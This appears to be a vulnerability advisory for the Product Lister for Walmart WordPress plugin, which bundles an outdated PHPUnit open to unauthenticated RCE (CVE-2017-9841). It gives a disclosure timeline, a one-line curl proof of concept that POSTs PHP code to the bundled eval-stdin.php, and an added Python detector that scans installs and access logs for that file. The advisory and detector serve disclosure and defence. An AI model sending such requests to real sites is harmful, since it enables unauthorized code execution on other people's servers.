Product Lister for Walmart <= 1.0.0 - Unauthenticated RCE via Outdated PHPUnit

Description
The plugin bundles an outdated copy of the PHPUnit library, which is known to be affected by an unauthenticated remote code execution (RCE) vulnerability (CVE-2017-9841).

February 28th, 2020 - Ticket sent to vendor via https://support.cedcommerce.com/open.php
March 6th, 2020 - Update requested from vendor (also realised that the ticket had been closed without a reason given)
March 12th, 2020 - Ticket closed again without explanation
March 12th, 2020 - Issue escalated to WP plugins team
March 18th, 2020 - WP Plugins Team investigating & plugin closed
March 25th, 2020 - Disclosure
Proof of Concept
curl -X POST --data "<?php echo php_uname(); ?>" http://example.com/wp-content/plugins/product-lister-walmart/marketplaces/walmart/lib/walmart-signature/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
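For defenders, an added example that is not part of the WPScan entry: a Python check that (a) walks a WordPress tree for a bundled eval-stdin.php, the file the PoC above targets, and (b) flags access-log requests aimed at it. The directory layout and log lines it uses are constructed for the demo; the log parser assumes Common Log Format.

```python
import os
import re
import tempfile
from pathlib import Path

# PHPUnit script abused in CVE-2017-9841; path fragment taken from the PoC URL above.
EVAL_STDIN = "vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
# Common Log Format fields we need: client, method, path, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')


def find_eval_stdin(wp_root):
    """Return every bundled eval-stdin.php below wp_root (relative paths).
    The file should never be web-served, whichever plugin or theme ships it."""
    root = Path(wp_root)
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            rel = (Path(dirpath) / name).relative_to(root).as_posix()
            if rel.endswith(EVAL_STDIN):
                hits.append(rel)
    return sorted(hits)


def flag_requests(log_lines):
    """Return (client, method, path, status) for requests aimed at eval-stdin.php.
    A 200 to a POST reached the PHP file; a 403/404 still identifies scanning."""
    flagged = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and m.group(3).split("?", 1)[0].endswith("eval-stdin.php"):
            flagged.append((m.group(1), m.group(2), m.group(3), int(m.group(4))))
    return flagged


def build_sample_tree():
    """Throwaway directory mimicking the vulnerable plugin layout (constructed
    for the demo; the file body is a placeholder, not real PHPUnit code)."""
    root = Path(tempfile.mkdtemp())
    plugin = root / "wp-content/plugins/product-lister-walmart/marketplaces/walmart/lib/walmart-signature"
    (plugin / EVAL_STDIN).parent.mkdir(parents=True)
    (plugin / EVAL_STDIN).write_text("<?php // placeholder\n")
    return root


# Constructed access-log lines (not real traffic): benign, a hit, and a blocked probe.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Mar/2020:10:00:01 +0000] "GET /wp-login.php HTTP/1.1" 200 1234',
    '203.0.113.9 - - [25/Mar/2020:10:00:02 +0000] "POST /wp-content/plugins/product-lister-walmart/marketplaces/walmart/lib/walmart-signature/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 56',
    '198.51.100.7 - - [25/Mar/2020:10:00:03 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0',
]
```

Run find_eval_stdin against the real document root rather than build_sample_tree() to audit an install; any hit means the plugin (or whatever ships the file) should be removed or the file deleted and the path blocked at the web server.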

Affects Plugin
Product Lister for Walmart <= 1.0.0

Fix
No known fix - plugin closed

References

CVE 2017-9841
URL http://web.archive.org/web/20170701212357/http://phpunit.vulnbusters.com/

Classification

Type RCE
OWASP Top 10 A1: Injection
CWE CWE-94

Miscellaneous

Verified Yes
WPVDB ID 10150

Timeline

Publicly Published 2020-03-25
Added 2020-03-25
Last Updated 2020-03-26
